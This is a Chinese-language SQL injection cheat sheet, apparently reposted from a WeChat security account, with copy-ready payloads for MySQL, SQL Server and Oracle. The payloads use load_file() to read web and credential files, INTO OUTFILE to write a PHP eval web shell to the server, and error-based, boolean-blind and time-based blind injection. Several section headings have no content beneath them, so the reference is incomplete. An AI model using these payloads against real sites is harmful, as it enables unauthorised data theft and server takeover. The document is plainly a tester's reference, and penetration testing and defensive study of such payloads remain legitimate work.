SQL注入速查笔记 4年前

架构设计
4327
SQL注入速查笔记

SQL 注入分类方式:

提交方式:GET  POST COOKIE

0x01 Mysql


Mysql划分:权限  root        普通用户 版本  mysql>5.0   mysql<5.0

1.1 root权限

load_file和into outfile用户必须有FILE权限,并且还需要知道网站的绝对路径

判断是否具有读写权限

and (select count(*) from mysql.user)>0#

A、Load_file() 该函数用来读取源文件的函数,只能读取绝对路径的网页文件

注意:路径符号”\”错误  “\”正确  “/”正确,转换成十六进制,不用“”

id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(’/var/www/index.php’)(物理路径转16进制)

可以用来读取数据库连接文件获取数据连接账号、密码等

?id=1'and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php')%23

B、into outfile函数

条件:1. 绝对路径    2.可以使用单引号

?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'

1.2 MySQL联合查询

1.2.1 适用于mysql低于5.0版本

1.判断是否可以注入

1.2.2 适用于Mysql 5.0以上版本支持查表查列

1.先判断是否可以注入

1.3 MySQL报错注入

mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法。

多种报错注入方式:

and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);

1.4 MySQL盲注

基于布尔型注入

id=1 and (select length(user()))=20 # 返回正常页面  长度20位

基于时间型注入

1 xor (if(ascii(mid(user()from(1)for(1)))='r',sleep(5),0))

0x02 SQLServer


SA权限:数据库操作,文件管理,命令执行,注册表读取等

Db权限:文件管理,数据库操作等

Public权限:数据库操作

2.1 SQLServer 联合查询

1.判断是否存在注入

2.2 SQLServer 报错注入

1.获取表名

2.3 SQLServer 盲注

1、猜表名

0x03 Oracle


3.1 联合查询

Union select null,null,null   从第一个null开始加’null’,得到显示位

3.2 手工显错注入

最大的区别就是utl_inaddr.get_host_address这个函数,10g可以调用,11g需要dba高权限

3.3 盲注

基于布尔类型的盲注:

?id=7782' and length((SELECT name FROM v$database))=4--  获取数据库名长度

基于时间延迟的盲注:

?id=7782' and 1=(CASE WHEN (ascii(substr((SELECT name FROM v$database),1,1))=79) THEN 1 ELSE 2 END)--

本文分享自微信公众号 - Bypass(Bypass--)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。

h
holynight01
世上只有一种英雄主义,那就是认清生活然后去热爱生活。
2
发布数
0
关注者
4448
累计阅读

热门教程文档

Spring Cloud
8小节
爬虫
6小节
HTML
32小节
Javascript
24小节
CSS
33小节
广告